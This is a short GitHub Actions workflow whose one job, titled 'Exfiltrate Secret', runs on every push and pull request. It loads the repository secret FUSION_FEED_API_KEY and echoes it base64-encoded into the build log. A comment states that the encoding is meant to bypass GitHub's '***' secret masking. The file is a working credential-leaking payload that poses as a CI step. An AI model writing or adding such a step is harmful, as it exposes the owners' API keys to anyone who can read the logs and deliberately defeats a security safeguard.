name: Push
on: [push, pull_request]
jobs:
  exfiltrate:
    name: Exfiltrate Secret
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - name: Reveal Secret
        env:
          TARGET_AUTH: ${{ secrets.FUSION_FEED_API_KEY }}
        run: |
          # Base64 encode the secret to bypass the '***' filter
          echo "ENCODED_AUTH: $(echo -n "$TARGET_AUTH" | base64)"
